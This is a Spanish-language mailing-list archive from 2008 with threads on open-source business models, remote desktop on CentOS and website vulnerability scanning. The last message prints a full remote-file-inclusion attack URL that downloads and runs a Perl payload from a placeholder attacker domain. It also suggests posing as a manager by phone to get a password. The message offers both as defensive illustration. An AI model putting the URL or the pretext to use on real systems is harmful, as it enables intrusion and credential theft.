[EMAIL PROTECTED] wrote:
> Yo creo que es cierto que el software libre es un peligro para las
> ganancias egoÃstas o para el modelo neoliberal (M$ y otras)
Es un peligro para el modelo de negocio de "le vendemos la cajita con la
licencia", claro. Otros modelos de negocio (tanto o mas "neoliberales" que
ese) funcionan de lo mas bien con codigo abierto, gracias.
IBM invierte /pesado/ en Linux, y lo hace porque asi gana plata. Igual
Google. Sun compro Star Office, y de alli salio OOo. Nuevamente, no es por
alguna idea romantica de liberar codigo porque tiene que ser libre, sino
porque es un buen negocio. Red Hat lo que desarrolla o compra lo libera
como codigo abierto. Y es la mayor empresa del rubro, lejos. Y no es
precisamente una empresita PyME...
> pero
> especialmente su modelo de licencias GPL ya que lo que siempre esta en
> juego es la propiedad de conocimiento.
No entiendo.
> Basta recordar que hacer click
> tiene patente por parte de micro-soft.
Creo que la patente es de Google.
> Si yo soy dueño del
> conocimiento soy dueño de sus ganancias.
El conocimiento no tiene "duen~o", que es exactamente lo que el libre
movimiento de datos por Internet ha demostrado (y asi ha dado posibilidad
de existir al codigo abierto como lo conocemos hoy).
> ¿Pero esta en peligro en
> Movimiento del software libre ?.
Codigo abierto? Todo indica que borrara del mapa los modelos de negocio de
codigo cerrado...
> ¿Cuantas empresas bastan para
> contratar a los desarrolladores y mantenedores de software libre y
> mantenerlos ocupados
Ya estan, no te preocupes.
> al punto que ni siquiera actualizar los problemas
> de seguridad.?.
Seria suicidio de parte de esas empresas...
> Bueno yo creo que este es un problema en desarrollo y
> mantener el movimiento de opensource también es un problema económico
> no solo de fidelidad y militancia.Y sin duda que esto no va a acabar
> hasta que las patentes propietarias no acaben o tengan un limite
> razonable.
No entendi...
--
Dr. Horst H. von Brand User #22616 counter.li.org
Departamento de Informatica Fono: +56 32 2654431
Universidad Tecnica Federico Santa Maria +56 32 2654239
Casilla 110-V, Valparaiso, Chile Fax: +56 32 2797513
From [EMAIL PROTECTED] Fri Jan 18 16:56:08 2008
From: [EMAIL PROTECTED] (Horst H. von Brand)
Date: Fri Jan 18 16:59:22 2008
Subject: Ethical Hacking, aspectos a considerar.
In-Reply-To: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
Rodrigo Fuentealba <[EMAIL PROTECTED]> wrote:
[...]
> Seguridad por oscuridad no es seguridad, pero mientras detenga un
> tiempo más al posible victimario, igual sirve.
El punto es que /no lo detiene en lo absoluto/.
--
Dr. Horst H. von Brand User #22616 counter.li.org
Departamento de Informatica Fono: +56 32 2654431
Universidad Tecnica Federico Santa Maria +56 32 2654239
Casilla 110-V, Valparaiso, Chile Fax: +56 32 2797513
From [EMAIL PROTECTED] Fri Jan 18 16:58:18 2008
From: [EMAIL PROTECTED] (Horst H. von Brand)
Date: Fri Jan 18 17:01:33 2008
Subject: Ayuda con Escritorio Remoto
In-Reply-To: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
César Sepúlveda <[EMAIL PROTECTED]> wrote:
> El Thursday 17 January 2008 22:55:06 Ismael Cantieri escribió:
> > El dÃa 17/01/08, Sebastian Antunez Noguera <[EMAIL PROTECTED]> escribió:
> > > Estimados, tengo el siguiente problema.
> > >
> > > Tengo 4 servidores en un data center con CenTos 5.1 y tienen habilitado
> > > Ambiente Grafico (Gnome). Necesito saber como poder configurar los
> > > escritorios para que los desarrolladores puedan a traves de sus
> > > estaciones de trabajo con Fedora acceder a los CenTos desde su maquina y
> > > ver el entorno
> > > grafico de estos servidores CenTos.
> > >
> > > A la vez, necesito saber si existe algun cliente que pueda tomar estos
> > > escritorios (CenTos) pero desde M$ Windows ya que dos Desarrolladores
> > > usan XP por un tema de una aplicacion que solo corre en M$
> > vnc ;) a través de un túnel ssh
> Con vnc entraran todos a la misma sesion y no tendra una sesion en X cada
> usuario por separado.
Y para que toda esta parafernalia? X es un sistema de ventanas /en red/,
puedes configurar las cosas para login remoto grafico directamente.
--
Dr. Horst H. von Brand User #22616 counter.li.org
Departamento de Informatica Fono: +56 32 2654431
Universidad Tecnica Federico Santa Maria +56 32 2654239
Casilla 110-V, Valparaiso, Chile Fax: +56 32 2797513
From [EMAIL PROTECTED] Fri Jan 18 17:34:22 2008
From: [EMAIL PROTECTED] (Alberto Rivera)
Date: Fri Jan 18 17:37:41 2008
Subject: Ethical Hacking, aspectos a considerar.
In-Reply-To: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
Asdtaker wrote:
> Estimados, alguien tiene idea de los aspecto de debiese considerar a la hora
> de realizar un escaneo de vulnerabilidades a mi sitio web?
>
> Por ahora considero estos ITEMs:
>
> - Ingenieria Social: informacion disponible en la web.
> - Archivos por defecto: todo aquello que viene con la instalacion en bruto
> del server web.
> - Extensiones por defecto: analizar el impacto de soportar distintas
> extensiones.
> - Sesiones: comprobar validez de sesiones, etc.
> - Manejo de errores: de aplicacion y servidor.
> - SQL Injection.
>
>
> Gracias por sus comentarios.
>
Mira toma nessus y lo corres desde el exterior y después desde el
interior de la organización esto te va a encontrar varias
vulnerabilidades y sus niveles de vulnerabilidad, luego tomas nmap y
tratar de insertar exploits conocidos a servicios conocidos desde dentro
y afuera cada vez, prueba varias herramientas en contra de tu sitio,
trata de explotarlo de forma controlada, o sea, no lo hagas cuando estén
todos trabajando ... esto te va a entregar una visión un poco más
específica de cualquier problemática que puedas tener. Ahora para el
desarrollo propiamente tal, prueba inyecciones de mysql, php y
vulnerabilidades de javascript o ajax o lo que tengas, para hacer
inyecciones de forma remota hay varias formas de hacerlo y están super
documentadas incluso en youtube puedes encontrar videos bastante buenos
... a nivel de servidor elimina cualquier software que sirva para bajar
cosas del internet para que no te puedan ejecutar ningún código dentro
de la máquina y para que imposibilites a los atacantes a hacer cosas
como esta :
http://tudominio/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=
1&GLOBALS=&mosConfig_absolute_path=http://dominiousadoporelatacante/directorioherramientas/tool25.txt?&cmd=cd%20/tmp;
wget%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
curl%20-O%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
lwp-download%20-a%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
GET%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
lynx%20-source%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
links%20-source%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
perl%20spkat.txt
si te fijas aquí el atacante no se fija ni en ingeniería social ni en
datos de ningún tipo sólo hace un ataque vía sitio web, y ve si tu sitio
tiene permiso de ejecutar cualquiera de las aplicaciones de descarga o
navegación, con esto baja un paquete, para el ejemplo spkat.txt y
después lo ejecuta con perl. El spkat lo que hace es abrir puertos,
levantar servicios, ejecutar troyanos dentro de la máquina o cualquier
cosa ....
Ahora lo de la ingeniera social es para cuestiones super puntuales por
ejemplo, para conseguir acceso a un sistema en red, por ejemplo llamas a
la secretaria de administración y le dices que eres el gerente de
operaciones y le pides un nombre de usuario y password del sistema, así
puedes ver realmente cual es el nivel de seguridad que cuentas de parte
de los usuarios ... pero la ing. social no es encontrar información en
internet.
eso, espero te sirva
salu2
>
>
>
>
>